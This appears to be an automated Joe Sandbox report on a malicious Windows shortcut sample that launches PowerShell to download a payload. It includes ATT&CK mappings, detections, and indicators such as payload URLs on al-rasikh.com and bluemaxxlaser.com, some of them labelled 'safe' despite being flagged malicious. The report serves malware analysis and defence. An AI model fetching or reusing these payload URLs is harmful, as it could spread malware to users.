      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid Accounts11
      Command and Scripting Interpreter
      1
      Scripting
      11
      Process Injection
      11
      Masquerading
      OS Credential Dumping11
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell
      1
      Registry Run Keys / Startup Folder
      1
      Registry Run Keys / Startup Folder
      31
      Virtualization/Sandbox Evasion
      LSASS Memory11
      Process Discovery
      Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Process Injection
      Security Account Manager31
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets1
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials21
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578189 Sample: FjfZ7uM8zh.lnk Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 25 www.astenterprises.com.pk 2->25 27 www.al-rasikh.com 2->27 29 7 other IPs or domains 2->29 37 Antivirus / Scanner detection for submitted sample 2->37 39 Windows shortcut file (LNK) starts blacklisted processes 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 8 other signatures 2->43 9 powershell.exe 17 23 2->9         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 31 al-rasikh.com 107.161.23.150, 443, 49705, 49706 RAMNODEUS United States 9->31 33 www.bluemaxxlaser.com 203.175.174.69, 49707, 80 SGGS-AS-APSGGSSG Singapore 9->33 45 Windows shortcut file (LNK) starts blacklisted processes 9->45 47 Powershell creates an autostart link 9->47 15 Acrobat.exe 20 61 9->15         started        17 powershell.exe 7 9->17         started        19 conhost.exe 1 9->19         started        35 127.0.0.1 unknown unknown 13->35 signatures6 process7 process8 21 AcroCEF.exe 108 15->21         started        process9 23 AcroCEF.exe 6 21->23         started       

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      FjfZ7uM8zh.lnk25%VirustotalBrowse
      FjfZ7uM8zh.lnk29%ReversingLabsShortcut.Trojan.FakeupdateLNK
      FjfZ7uM8zh.lnk100%AviraLNK/Dldr.Agent.VPUF
      FjfZ7uM8zh.lnk100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://www.al-rasikh.com/mk/neat.txt-UseBasicParsing0%Avira URL Cloudsafe
      https://www.al-rasikh.com/mk/nea0%Avira URL Cloudsafe
      http://www.bluemaxxlaser.com/ms/ms.vbs0%Avira URL Cloudsafe
      https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf0%Avira URL Cloudsafe
      https://www.al-rasikh.com0%Avira URL Cloudsafe
      http://www.blud1dmaxxlasd1dr.com/ms/ms.vbsX0%Avira URL Cloudsafe
      http://www.astenterprises.com.pk0%Avira URL Cloudsafe
      https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf80%Avira URL Cloudsafe
      http://al-rasikh.com0%Avira URL Cloudsafe
      http://www.al-rasikh.com0%Avira URL Cloudsafe
      https://www.astenterprises.com.pk0%Avira URL Cloudsafe
      http://www.blud1dmaxxlasd1dr.com/ms/ms.0%Avira URL Cloudsafe
      http://www.bluemaxxlaser.com0%Avira URL Cloudsafe
      https://www.astd1dntd1drprisd1ds.com.pk/ms/List%20of%20rd1dquird1dd%20itd1dms%20and%20sd1drvicd1ds.p0%Avira URL Cloudsafe
      https://www.al-rasikh.com/mk/neat.txt0%Avira URL Cloudsafe
      http://www.blud1dmaxxlasd1dr.com/ms/ms.vbs0%Avira URL Cloudsafe
      http://astenterprises.com.pk0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      199.232.210.172
      truefalse
        high
        astenterprises.com.pk
        107.161.23.150
        truefalse
          unknown
          www.bluemaxxlaser.com
          203.175.174.69
          truefalse
            unknown
            default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
            217.20.58.100
            truefalse
              high
              al-rasikh.com
              107.161.23.150
              truetrue
                unknown
                x1.i.lencr.org
                unknown
                unknownfalse
                  high
                  www.al-rasikh.com
                  unknown
                  unknowntrue
                    unknown
                    www.astenterprises.com.pk
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://www.bluemaxxlaser.com/ms/ms.vbsfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdffalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.al-rasikh.com/mk/neat.txttrue
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1698340520.0000015123573000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1698340520.00000151236B5000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.6.drfalse
                          high
                          https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf8powershell.exe, 00000001.00000002.1621793505.0000015115372000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1621793505.0000015113732000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1621793505.0000015113732000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://go.micropowershell.exe, 00000001.00000002.1621793505.0000015114132000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.al-rasikh.compowershell.exe, 00000001.00000002.1621793505.0000015114BAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://contoso.com/Licensepowershell.exe, 00000001.00000002.1698340520.00000151236B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Iconpowershell.exe, 00000001.00000002.1698340520.00000151236B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://al-rasikh.compowershell.exe, 00000001.00000002.1621793505.0000015114BAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crl.ver)svchost.exe, 00000007.00000002.2732096738.0000023873400000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 00000007.00000003.1593761579.0000023873350000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drfalse
                                        high
                                        https://www.al-rasikh.com/mk/neat.txt-UseBasicParsingpowershell.exe, 00000001.00000002.1621087749.00000151117D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1613639617.00000151114E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1708575138.000001512B644000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1621232451.0000015112E10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1613942378.0000015111557000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1710540369.000001512B8B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.al-rasikh.compowershell.exe, 00000001.00000002.1621793505.0000015114B32000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.al-rasikh.com/mk/neapowershell.exe, 00000001.00000002.1621793505.0000015113732000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.blud1dmaxxlasd1dr.com/ms/ms.vbsXpowershell.exe, 00000001.00000002.1621793505.0000015114C2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1621793505.0000015113732000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.astenterprises.com.pkpowershell.exe, 00000001.00000002.1621793505.0000015115463000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://g.live.com/odclientsettings/Prod/C:edb.log.7.drfalse
                                            high
                                            http://astenterprises.com.pkpowershell.exe, 00000001.00000002.1621793505.0000015115463000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.blud1dmaxxlasd1dr.com/ms/ms.powershell.exe, 00000001.00000002.1621793505.0000015114C2F000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.astenterprises.com.pkpowershell.exe, 00000001.00000002.1621793505.0000015115372000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.astd1dntd1drprisd1ds.com.pk/ms/List%20of%20rd1dquird1dd%20itd1dms%20and%20sd1drvicd1ds.ppowershell.exe, 00000001.00000002.1621793505.0000015115372000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.bluemaxxlaser.compowershell.exe, 00000001.00000002.1621793505.00000151154D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://contoso.com/powershell.exe, 00000001.00000002.1698340520.00000151236B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1698340520.0000015123573000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1698340520.00000151236B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://aka.ms/pscore68powershell.exe, 00000001.00000002.1621793505.0000015113501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530575116.00000217A74F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530575116.00000217A74E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1621793505.0000015113501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530575116.00000217A74AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.blud1dmaxxlasd1dr.com/ms/ms.vbspowershell.exe, 00000001.00000002.1621793505.0000015114BDF000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    203.175.174.69
                                                    www.bluemaxxlaser.comSingapore
                                                    24482SGGS-AS-APSGGSSGfalse
                                                    107.161.23.150
                                                    astenterprises.com.pkUnited States
                                                    3842RAMNODEUStrue
                                                    IP
                                                    127.0.0.1
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1578189
                                                    Start date and time:2024-12-19 11:55:11 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 5m 29s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:18
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:FjfZ7uM8zh.lnk
                                                    renamed because original name is a hash value
                                                    Original Sample Name:59d532293086dd82eeede4bd5f35902c8836b26d012891db2ee9f5b2056e76bb.lnk
                                                    Detection:MAL
                                                    Classification:mal100.evad.winLNK@20/57@6/3
                                                    EGA Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 9
                                                    • Number of non-executed functions: 4
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .lnk
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                    • Excluded IPs from analysis (whitelisted): 23.218.208.137, 162.159.61.3, 172.64.41.3, 23.218.208.109, 34.237.241.83, 54.224.241.105, 50.16.47.176, 18.213.11.84, 199.232.210.172, 23.195.61.56, 184.30.20.134, 23.32.239.56, 2.19.198.27, 52.149.20.212, 3.233.129.217, 13.107.246.63
                                                    • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                    • Execution Graph export aborted for target powershell.exe, PID 3020 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 5836 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    TimeTypeDescription
                                                    05:56:17API Interceptor44x Sleep call for process: powershell.exe modified
                                                    05:56:26API Interceptor2x Sleep call for process: svchost.exe modified
                                                    05:56:38API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    203.175.174.6964Tgzu2FKh.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                    • bluemaxxlaser.com/rh/rheu.bin
                                                    zp.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                    • bluemaxxlaser.com/rh/rh.bin
                                                    eua.ps1Get hashmaliciousGuLoaderBrowse
                                                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                    zp.ps1Get hashmaliciousUnknownBrowse
                                                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                    zk.ps1Get hashmaliciousUnknownBrowse
                                                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                    mx.ps1Get hashmaliciousUnknownBrowse
                                                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                    zpeu.exeGet hashmaliciousGuLoaderBrowse
                                                    • bluemaxxlaser.com/rh/rheu.bin
                                                    as.ps1Get hashmaliciousGuLoaderBrowse
                                                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                    107.161.23.150List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                      List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                        List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                          List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                            List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                              xw0K5Lahxz.exeGet hashmaliciousUnknownBrowse
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                www.bluemaxxlaser.comeua.ps1Get hashmaliciousGuLoaderBrowse
                                                                • 203.175.174.69
                                                                zp.ps1Get hashmaliciousUnknownBrowse
                                                                • 203.175.174.69
                                                                zk.ps1Get hashmaliciousUnknownBrowse
                                                                • 203.175.174.69
                                                                mx.ps1Get hashmaliciousUnknownBrowse
                                                                • 203.175.174.69
                                                                as.ps1Get hashmaliciousGuLoaderBrowse
                                                                • 203.175.174.69
                                                                bg.microsoft.map.fastly.netDix7g8PK1e.pdfGet hashmaliciousUnknownBrowse
                                                                • 199.232.210.172
                                                                CROC000400 .pdfGet hashmaliciousUnknownBrowse
                                                                • 199.232.210.172
                                                                contract_signed.pdfGet hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                T.T_Copy.12.18.2024.exeGet hashmaliciousArrowRATBrowse
                                                                • 199.232.214.172
                                                                22054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
                                                                • 199.232.214.172
                                                                Sh2uIqqKqc.exeGet hashmaliciousCryptbotBrowse
                                                                • 199.232.214.172
                                                                alyemenione.lnkGet hashmaliciousHavoc, QuasarBrowse
                                                                • 199.232.214.172
                                                                R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                • 199.232.214.172
                                                                A file has been sent to you via DROPBOX.pdfGet hashmaliciousUnknownBrowse
                                                                • 199.232.210.172
                                                                PyIsvSahWy.exeGet hashmaliciousUnknownBrowse
                                                                • 199.232.210.172
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                RAMNODEUSList of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                • 107.161.23.150
                                                                List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                • 107.161.23.150
                                                                List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                • 107.161.23.150
                                                                List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                • 107.161.23.150
                                                                List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                • 107.161.23.150
                                                                owari.x86.elfGet hashmaliciousUnknownBrowse
                                                                • 168.235.88.56
                                                                owari.ppc.elfGet hashmaliciousUnknownBrowse
                                                                • 168.235.65.115
                                                                i486.elfGet hashmaliciousMiraiBrowse
                                                                • 168.235.88.39
                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                • 107.161.24.95
                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                • 107.161.24.95
                                                                SGGS-AS-APSGGSSGteste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                • 103.14.247.60
                                                                na.elfGet hashmaliciousGafgytBrowse
                                                                • 103.14.247.29
                                                                na.elfGet hashmaliciousGafgytBrowse
                                                                • 103.14.247.60
                                                                jZ6ejWIrSV.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 103.14.247.64
                                                                IGvLaRmr0J.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 103.14.247.58
                                                                wget.elfGet hashmaliciousGafgytBrowse
                                                                • 103.14.247.62
                                                                4v7myD9mN2OaWZp.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 203.175.171.5
                                                                rNNA.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 203.175.171.5
                                                                wg2vKIF0SU.elfGet hashmaliciousGafgytBrowse
                                                                • 103.14.247.45
                                                                LF6B2XTwcV.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 103.14.247.32
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0et5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                • 107.161.23.150
                                                                RFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                • 107.161.23.150
                                                                File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                • 107.161.23.150
                                                                File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                • 107.161.23.150
                                                                DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 107.161.23.150
                                                                4089137200.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 107.161.23.150
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                • 107.161.23.150
                                                                Dix7g8PK1e.pdfGet hashmaliciousUnknownBrowse
                                                                • 107.161.23.150
                                                                Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                • 107.161.23.150
                                                                main1.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                • 107.161.23.150
                                                                No context
                                                                Process:C:\Windows\System32\svchost.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1310720
                                                                Entropy (8bit):0.8022123649274375
                                                                Encrypted:false
                                                                SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAC:RJE+Lfki1GjHwU/+vVhWqpf
                                                                MD5:170A0C2A340AA8AE9C1685FB2AE8F042
                                                                SHA1:B26AB2B91E8375ADC2D5403808FC5A8BEF39DB0A
                                                                SHA-256:B65BB750B85DA3F16954A5D3C7ACF656F1501B53C073E96220EE4E103DC01D3F
                                                                SHA-512:6AFFD17E160C82A727CA78D291061A7B447D7FB0772B83E26E536283F1031ABC9581A2B025921394DDE0BEE47F8EF3DC5ABC1DE01A30CC55428CCEB457D547DA
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                Process:C:\Windows\System32\svchost.exe
                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x4bf86139, page size 16384, DirtyShutdown, Windows version 10.0
                                                                Category:dropped
                                                                Size (bytes):1048576
                                                                Entropy (8bit):0.9433403461398111
                                                                Encrypted:false
                                                                SSDEEP:1536:jSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:jazaHvxXy2V2UR
                                                                MD5:48889FF5F31D1462D8ADD9A0FADEBB78
                                                                SHA1:CFD8C6BAA6D3E35F649DBC5DEE6016810BB5B8B2
                                                                SHA-256:9679624B18E303A278EB63004A75AE27E76A432F57AD9D8386B2F325FEA06D3D
                                                                SHA-512:1F832FA4C2E39EF603C5BCAAA0EBDF491FB033E178AE9620B6E5299F26B72EFEBBCA1D803BA5308C49CB89B17FD09AC823EC7F9DC12478AC64614A630D769461
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:K.a9... ...............X\...;...{......................0.x...... ...{s..8...|..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{.....................................6.8...|....................7..8...|...........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\svchost.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):16384
                                                                Entropy (8bit):0.08145909943139384
                                                                Encrypted:false
                                                                SSDEEP:3:Bll8YeIPlsl/nqlFcl1ZUllllfSy8lallGBnX/l/Tj/k7/t:Tl8zQsl/qlFclQ/l4A254
                                                                MD5:BB70C5B2CF3CBC55756CBAAAD866DBF9
                                                                SHA1:83C5F85BDBFC4D88BB2994678DE380182C526609
                                                                SHA-256:0305638F44197493BF6356D3EABD9F0B849F5D37AA353B2707A7278B1944EF86
